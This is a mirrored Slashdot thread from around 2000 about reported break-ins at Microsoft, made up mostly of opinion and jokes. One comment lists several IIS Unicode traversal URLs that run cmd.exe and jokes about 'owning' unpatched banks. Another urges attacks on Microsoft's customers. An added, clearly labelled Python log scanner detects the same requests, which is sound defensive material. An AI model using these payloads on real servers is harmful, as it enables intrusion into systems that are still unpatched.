Slashdot Mirror


Microsoft Cracked again?

Dominic writes: "Seems Microsoft have been hacked (possibly) again, according to InfoWorld." They don't seem to have a lot of evidence, but there's some interesting commentary related to this, and the earlier crack where the source code to Windows and Office was supposedly stolen (I'll believe that when I see it).

11 of 185 comments

  1. Cracking Microsoft is a bad idea. by paai · · Score: 5

    What I do not understand is why so many people try to crack Microsoft itself. Yes, sure, you wave your manhood for everybody to admire its size, but...
    ... in the meantime you help actively to make the Microsoft-site the best-protected site in the world. Do you want that?
    So mess with the customers of Microsoft as much as you want, embarrass them for the whole world, but leave Microsoft itself alone! There may come a time when it is desperately necessary to break into the Microsoft stronghold and *then* you want all those exploits wide open; not plugged.

  2. Patches and Absolute Certainty by Lostman · · Score: 4

    "It's hard to give you an absolute certainty that the patch had been applied across the board. Given today's incident, our security teams are going back to check out the systems."

    This statement is particularly disheartening. When the problems with Microsoft Outlook Express and the "features" that allow viruses to spread have their only fix with these Patches, and that -- according to even Microsoft -- it's hard to make sure that the patches are applied completely: we should worry.

    One might say that the little Microsoft Accessories should have been coded correctly the first time (before being published) but that is often a very hard thing to do.

    I am asking You All: What ways could we make sure that "patches" had been applied across the board?

  3. Re:Which server by ryanr · · Score: 4

    I was given a copy of a small log that Dimitri shared with the IDG reporter. Egg.microsoft.com was not one of the servers mentioned.

    And yes, the exploit was nearly identical to one of the lines you mentioned above.

    (The IDG reporter said I couldn't share the log, sorry. Though it's possible that restriction might be gone now that the story has been published. The Infoworld story is a reprint of the IDG story that broke on Friday. Strangely enough, I didn't actually say the first sentence attributed to me in the article.)

  4. You better not see it... by Cid+Highwind · · Score: 5

    ...source code to Windows and Office was supposedly stolen (I'll believe that when I see it)

    Unfortunately, pursuant to subparagraph J of section 3, chapter 13 of the Microsoft end-user license agreement (EULA), Microsoft reserves the right to terminate any user who comes in contact with the Windows source code.

    If you do receive the code via email or any other means, you are required to unplug your computer, telephone, and television, close your eyes, cover your ears, and chant "la la la, I can't hear you". Failure to comply with these provisions that protect our intellectual property is a violation of the DMCA, and will result in the MS Death-Commando(tm) being dispatched to your location.

    We reserve the right to take legal action against anyone who has seen the aforementioned code, anyone who assisted in the theft of the code, anyone who made funny remarks about our IP protection measures, and anyone who found said illegal statements humorous. Stop laughing, we mean it

    --
    0 1 - just my two bits
  5. Re:ummm.... by xinit · · Score: 4
    How's this for a conspiracy theory;

    Monday November 27, 9:00 am Eastern Time

    Press Release

    Microsoft Eliminates Security Problems related to Linux 'Hacker OS'

    Redmond, Wa--(BUSINESS WIRE)--Nov. 27, 2000--Microsoft Corp. (Nasdaq NMS: MSFT) today announced that it has discovered the reasons behind the recent web breakins that have plagued them, and since eliminated them.

    "We have been working for the past month performing an audit of all of our systems that could have been the source of the leak. We found that one of our corporate file servers had been replaced with one of those Linux boxes running Samba. Someone in our intranet development team thought that it would be a good way to keep his budget in line. Well, he knows better now, introducing an insecure free 'operating system' like that in our network - it's a career limiting move." stated Phil Todd, PR spokesperson for Microsoft.

    Phil goes on to describe how a malicious hacker was able to remotely cause the source code in the Linux Computer to send him the Confidential Windows Source Code (tm). Linux 'Kernel Hackers' as they call themselves often do this kind of modification in order to make corporate firewalls useless. "You just never know what is in those free systems. There's nobody you can sue if things go wrong!" Phil added incredulously.

    Microsoft has since removed the offensive machine and replaced it with a Real Windows 2000 File Server. "Sure, some people say it's slower this way, but they're just misinformed. At least it's SECURE."

    About Microsoft

    Founded in 1975, Microsoft (Nasdaq ``MSFT'') is the worldwide leader in software for personal computers and business computing. The company offers a wide range of products and services designed to empower people through great software -- any time, any place and on any device. Microsoft is a registered trademark of Microsoft Corp. in the United States and/or other countries. Other product and company names herein may be trademarks of their respective owners.

    --
    --- http://foo.ca
  6. Microsoft's Servers != Microsoft Windows by xee · · Score: 5

    Notice how no news agency that has reported the recent cracks has equated the security flaws in Microsoft's network and servers to Microsoft's Windows operating system. No news agency is suggesting that "if you use windows, you could be next", as they often do with other reports. "Man dead after drinking poisoned orange juice... Find out if your orange juice could be poisoned - tonight at 10." Why is it that the news media is not running their usual tricks to scare the populace? In my (not ever humble) opinion, everyone running Windows is running the risk of their network/servers being cracked.


    -------

    --
    Oh shit! I forgot to click "Post Anonymously"...
  7. In other news... by zelyan · · Score: 5
    And in other news today, a politician lied, astronomers discovered an asteroid that has a 1000-to-1 chance of hitting Earth, and the Napster suit is still ongoing. Industry experts expect that the stock market will continue existing and the dot-coms "might go up, might go down, nobody really knows why they do anything, anyway" said one macro economist.

    President Clinton could not be reached for comment, but Governor and Presidential candidate George W. Bush said "that's the way the cookie jar crumbles." No, we don't know what he was talking about either.

    Jeff

  8. Which server by x-empt · · Score: 5

    I am willing to bet this "hacker" owned egg.microsoft.com, which was not patched. It took them a few days to take it down and it still is offline.

    He was not a "hacker" he just created one of the unicode urls that got parsed incorrectly by IIS. No skill.

    http://target/scripts/..%c1%1c../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c0%9v../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c0%af../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c0%qf../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c1%8s../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c1%9c../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c1%pc../winnt/system32/ cmd.exe?/c+dir

    Ok, now kids, don't go owning any banks running IIS today (Most are not patched)!

    --
    Ever need an online dictionary?
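
Added example (not part of the original comment or thread): a log check for the kind of request the comment above lists, flagging paths that contain the bytes 0xC0 or 0xC1, which are never valid UTF-8 lead bytes, or broken percent-escapes. The log format, function names and sample lines are constructed for illustration.

```python
import re

BAD_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")   # "%" not followed by two hex digits
HEX_ESCAPE = re.compile(r"%([0-9A-Fa-f]{2})")

def inspect_path(path):
    """Return the reasons a request path looks like an encoded traversal attempt."""
    reasons = []
    if BAD_ESCAPE.search(path):
        reasons.append("malformed percent-escape")
    # Percent-decode once to raw bytes; do not interpret them as text yet.
    decoded = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), path)
    raw = decoded.encode("latin-1", "replace")
    for i, b in enumerate(raw):
        if b not in (0xC0, 0xC1):      # these two are never valid UTF-8 lead bytes
            continue
        nxt = raw[i + 1] if i + 1 < len(raw) else None
        if nxt is not None and 0x80 <= nxt <= 0xBF:
            # Lenient two-byte decode, to show what a permissive parser would see.
            ch = chr(((b & 0x1F) << 6) | (nxt & 0x3F))
            reasons.append(f"overlong UTF-8 for {ch!r}")
        else:
            reasons.append("invalid UTF-8 lead byte")
    return reasons

def scan_log(lines):
    """Return (line_number, reasons) for each flagged 'METHOD URI STATUS' line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        fields = line.split()
        if len(fields) < 2:
            continue
        reasons = inspect_path(fields[1].split("?", 1)[0])
        if reasons:
            hits.append((number, reasons))
    return hits

# Constructed sample lines in a simplified format (not a real IIS log).
SAMPLE_LOG = [
    "GET /default.htm 200",
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 200",
    "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 404",
    "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir 400",
    "GET /docs/caf%c3%a9.htm 200",   # valid two-byte UTF-8, must not be flagged
]

if __name__ == "__main__":
    for number, reasons in scan_log(SAMPLE_LOG):
        print(number, "; ".join(reasons))
```
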
  9. Script-kiddies and car-thieves by mangu · · Score: 4
    Following a simple analogy to your reasoning, if no car manufacturer ever publishes their design details, how do criminals find out how to start the engine without the key? Simply put, it takes an engineer to design something, but any punk can find out a way to break things.

    You are assuming script-kiddies need the source code to find out vulnerabilities in software, but the truth is, if they were able to understand the design intricacies of software they would not be script-kiddies.

    Believe me, for those of us who are competent enough to choose between building or destroying, it's much more rewarding to be creative.

  10. Big deal by Anonymous Coward · · Score: 4

    I haxored kernel.org and downloaded the linux source code

  11. MS Servers by Anonymous Coward · · Score: 5
    I love it, I absolutely love it. Sys admins are always being told that it's their fault for being hacked because they hadn't kept up on the latest patches. Now MS is whining and complaining that it's too hard to apply all those patches to all those servers. The message I'm getting is this:

    1) MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and

    2) Patching them won't even help you, because there are too many patches and too many holes. So many, in fact, that even MS can't keep up with them, even though the patches are developed and tested in the same building.

    Did I miss anything?